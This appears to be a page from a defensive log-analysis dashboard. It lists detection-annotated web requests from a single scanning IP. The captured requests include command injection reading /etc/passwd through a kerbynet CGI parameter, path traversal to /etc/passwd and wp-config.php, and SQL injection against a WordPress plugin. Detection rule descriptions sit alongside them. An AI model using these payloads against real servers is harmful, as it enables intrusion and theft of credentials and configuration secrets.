Log Explorer

Fact drill-down for 95.179.133.74

Risk 89 HIGH Scope All time All-time facts 1100 In-scope 1100 Filtered 1100 Seen 2023-10-14 → 2023-10-16

Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

HTTP facets

Snapshot facets

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

base 361 trav 303 sfp 283 proto 47 ua 34 cmdi 28 cred 19 scan_velocity 9 sqli 6 ref 5 hdrinj 4 fwprobe 1

Top labels (facts, in-scope)

observed 361 trav 303 sensitive_file 283 proto 47 ua 34 cmdi 28 cred 19 scan_velocity 9 sqli 6 ref 5 hdrinj 4 fwprobe 1

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 22 — total 1100 rows

← Prev Next →

#1 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301

ann trav 34 label trav

Request Path traversal / LFI indicator detected

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

Annotation facts

label

trav

rule

trav:sensitive_target

conf

95.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#2 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301

ann sfp 44 label sensitive_file

Request Explicit /etc/passwd read payload observed

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:payload:cat_passwd

conf

94.00

details

Payload contained an explicit attempt to read /etc/passwd. Snippet='/cgi-bin/kerbynet?Action=StartSessionSubmit&User=' cat /etc/passwd '&PW'

More (full fields + snapshot) expand

url

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

summary

Explicit /etc/passwd read payload observed

details

Payload contained an explicit attempt to read /etc/passwd. Snippet='/cgi-bin/kerbynet?Action=StartSessionSubmit&User=' cat /etc/passwd '&PW'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#3 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301

ann hdrinj 24 label hdrinj

Request Encoded newline detected (%0d/%0a)

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

Annotation facts

label

hdrinj

rule

hdrinj:encoded_newline

conf

90.00

details

Percent-encoded CR/LF sequences are a common indicator of CRLF injection / response splitting attempts.

More (full fields + snapshot) expand

url

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

summary

Encoded newline detected (%0d/%0a)

details

Percent-encoded CR/LF sequences are a common indicator of CRLF injection / response splitting attempts.

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#4 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301

ann base label observed

Request event observed

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#5 2023-10-16 20:59:39 event 233595 GET 404 bytes 6301

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=' cat /etc/passwd '&PW -'

More (full fields + snapshot) expand

url

/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=' cat /etc/passwd '&PW -'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#6 2023-10-16 20:58:35 event 233594 GET 404 bytes 6301

ann base label observed

Request event observed

/free_time.cgi

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/free_time.cgi

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#7 2023-10-16 20:56:25 event 233591 GET 404 bytes 6301

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

referer

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd'

More (full fields + snapshot) expand

url

/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

referer

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#8 2023-10-16 20:56:25 event 233591 GET 404 bytes 6301

ann base label observed

Request event observed

/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

referer

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

referer

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#9 2023-10-16 20:56:25 event 233590 GET 404 bytes 6301

ann base label observed

Request event observed

/solr/admin/cores?wt=json

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/solr/admin/cores?wt=json

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#10 2023-10-16 20:54:47 event 233587 GET 404 bytes 6301

ann base label observed

Request event observed

/secure/ContactAdministrators!default.jspa

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/secure/ContactAdministrators!default.jspa

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#11 2023-10-16 20:53:34 event 233584 GET 404 bytes 6301

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/LetsEncrypt/Index?fileName=/etc/passwd

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/LetsEncrypt/Index?fileName=/etc/passwd'

More (full fields + snapshot) expand

url

/LetsEncrypt/Index?fileName=/etc/passwd

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/LetsEncrypt/Index?fileName=/etc/passwd'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#12 2023-10-16 20:53:34 event 233584 GET 404 bytes 6301

ann base label observed

Request event observed

/LetsEncrypt/Index?fileName=/etc/passwd

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/LetsEncrypt/Index?fileName=/etc/passwd

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#13 2023-10-16 20:49:44 event 233581 POST 404 bytes 6301

ann base label observed

Request event observed

/checkValid

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/checkValid

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#14 2023-10-16 20:48:18 event 233580 GET 400 bytes 157

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#15 2023-10-16 20:48:18 event 233580 GET 400 bytes 157

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#16 2023-10-16 20:48:18 event 233579 GET http —

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#17 2023-10-16 20:48:18 event 233579 GET http —

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#18 2023-10-16 20:48:18 event 233580 GET 400 bytes 157

ann ua 8 label ua

Request Very short User-Agent string

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

Annotation facts

label

rule

ua:very_short

conf

65.00

details

Short/generic UAs are common in basic scripts and commodity automation.

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

summary

Very short User-Agent string

details

Short/generic UAs are common in basic scripts and commodity automation.

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#19 2023-10-16 20:48:18 event 233579 GET http —

ann ua 6 label ua

Request Missing User-Agent header

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

Annotation facts

label

rule

ua:missing

conf

60.00

details

Request had no User-Agent value (missing/empty field).

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

summary

Missing User-Agent header

details

Request had no User-Agent value (missing/empty field).

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#20 2023-10-16 20:48:18 event 233580 GET 400 bytes 157

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/h'

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/h'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#21 2023-10-16 20:48:18 event 233580 GET 400 bytes 157

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#22 2023-10-16 20:48:18 event 233579 GET http —

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/h'

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/h'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#23 2023-10-16 20:48:18 event 233579 GET http —

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#24 2023-10-16 20:48:18 event 233580 GET 400 bytes 157

ann base label observed

Request event observed

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#25 2023-10-16 20:48:18 event 233579 GET http —

ann base label observed

Request event observed

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

referer

—

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#26 2023-10-16 20:47:33 event 233576 GET 404 bytes 6301

ann base label observed

Request event observed

/Admin

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Admin

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#27 2023-10-16 20:47:06 event 233575 GET 200 bytes 8534

ann base label observed

Request event observed

/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#28 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#29 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#30 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301

ann sfp 8 label sensitive_file

Request File/path-style parameter observed (weak hint)

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:param:file_path_hint

conf

60.00

details

A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'

More (full fields + snapshot) expand

url

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

summary

File/path-style parameter observed (weak hint)

details

A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#31 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/api/filemanager?path=/../../Content'

More (full fields + snapshot) expand

url

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/api/filemanager?path=/../../Content'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#32 2023-10-16 20:46:14 event 233573 GET 404 bytes 6301

ann base label observed

Request event observed

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/api/filemanager?path=%2F..%2f..%2fContent

referer

Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#33 2023-10-16 20:45:04 event 233572 GET 403 bytes 555

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='gebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd'

More (full fields + snapshot) expand

url

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='gebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#34 2023-10-16 20:45:04 event 233572 GET 403 bytes 555

ann base label observed

Request event observed

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#35 2023-10-16 20:45:01 event 233571 GET 403 bytes 555

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

